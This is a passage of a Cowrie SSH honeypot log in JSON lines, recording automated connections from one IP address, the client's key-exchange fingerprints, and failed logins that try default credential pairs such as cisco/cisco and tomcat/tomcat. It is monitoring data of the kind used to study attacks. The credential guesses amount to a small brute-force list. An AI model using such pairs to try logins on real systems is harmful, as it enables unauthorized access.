{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:14.199383Z","src_ip":"212.227.235.229","session":"a47bd3f940ad"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:15.715120Z","src_ip":"212.227.235.229","session":"fef8b0ad3cf9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:15.923751Z","src_ip":"212.227.235.229","session":"a47bd3f940ad"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:16.593089Z","src_ip":"212.227.235.229","session":"569200bd1c09"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco","message":"login attempt [cisco/cisco] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:17.497420Z","src_ip":"212.227.235.229","session":"fef8b0ad3cf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59998,"dst_ip":"1.2.3.4","dst_port":22,"session":"4163a2c1c88d","protocol":"ssh","message":"New connection: 212.227.235.229:59998 (1.2.3.4:22) [session: 4163a2c1c88d]","sensor":"my-vps","timestamp":"2025-08-26T04:14:18.994956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:19.483150Z","src_ip":"212.227.235.229","session":"4163a2c1c88d"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:20.506402Z","src_ip":"212.227.235.229","session":"fef8b0ad3cf9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:22.355182Z","src_ip":"212.227.235.229","session":"4163a2c1c88d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48856,"dst_ip":"1.2.3.4","dst_port":22,"session":"f52b549d510d","protocol":"ssh","message":"New connection: 212.227.235.229:48856 (1.2.3.4:22) [session: f52b549d510d]","sensor":"my-vps","timestamp":"2025-08-26T04:14:24.094827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:24.096924Z","src_ip":"212.227.235.229","session":"f52b549d510d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:24.359607Z","src_ip":"212.227.235.229","session":"f52b549d510d"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:25.723932Z","src_ip":"212.227.235.229","session":"a47bd3f940ad"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:25.873424Z","src_ip":"212.227.235.229","session":"f52b549d510d"}
{"eventid":"cowrie.login.failed","username":"super","password":"super1234","message":"login attempt [super/super1234] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:26.742725Z","src_ip":"212.227.235.229","session":"4163a2c1c88d"}
{"eventid":"cowrie.session.closed","duration":"13.4","message":"Connection lost after 13.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:27.397205Z","src_ip":"212.227.235.229","session":"a47bd3f940ad"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:28.025626Z","src_ip":"212.227.235.229","session":"4163a2c1c88d"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:28.337737Z","src_ip":"212.227.235.229","session":"f52b549d510d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34880,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9cf376c4625","protocol":"ssh","message":"New connection: 212.227.235.229:34880 (1.2.3.4:22) [session: a9cf376c4625]","sensor":"my-vps","timestamp":"2025-08-26T04:14:30.290433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:30.291407Z","src_ip":"212.227.235.229","session":"a9cf376c4625"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:31.375698Z","src_ip":"212.227.235.229","session":"a9cf376c4625"}
{"eventid":"cowrie.login.failed","username":"mms","password":"mms","message":"login attempt [mms/mms] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:33.970932Z","src_ip":"212.227.235.229","session":"a9cf376c4625"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:35.415360Z","src_ip":"212.227.235.229","session":"a9cf376c4625"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57264,"dst_ip":"1.2.3.4","dst_port":22,"session":"79734ff4531b","protocol":"ssh","message":"New connection: 212.227.235.229:57264 (1.2.3.4:22) [session: 79734ff4531b]","sensor":"my-vps","timestamp":"2025-08-26T04:14:40.863617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:40.865024Z","src_ip":"212.227.235.229","session":"79734ff4531b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:41.140904Z","src_ip":"212.227.235.229","session":"79734ff4531b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57270,"dst_ip":"1.2.3.4","dst_port":22,"session":"10fecaf90c63","protocol":"ssh","message":"New connection: 212.227.235.229:57270 (1.2.3.4:22) [session: 10fecaf90c63]","sensor":"my-vps","timestamp":"2025-08-26T04:14:44.841150Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41436,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce5dc639b31a","protocol":"ssh","message":"New connection: 212.227.235.229:41436 (1.2.3.4:22) [session: ce5dc639b31a]","sensor":"my-vps","timestamp":"2025-08-26T04:14:48.860739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:48.862056Z","src_ip":"212.227.235.229","session":"ce5dc639b31a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-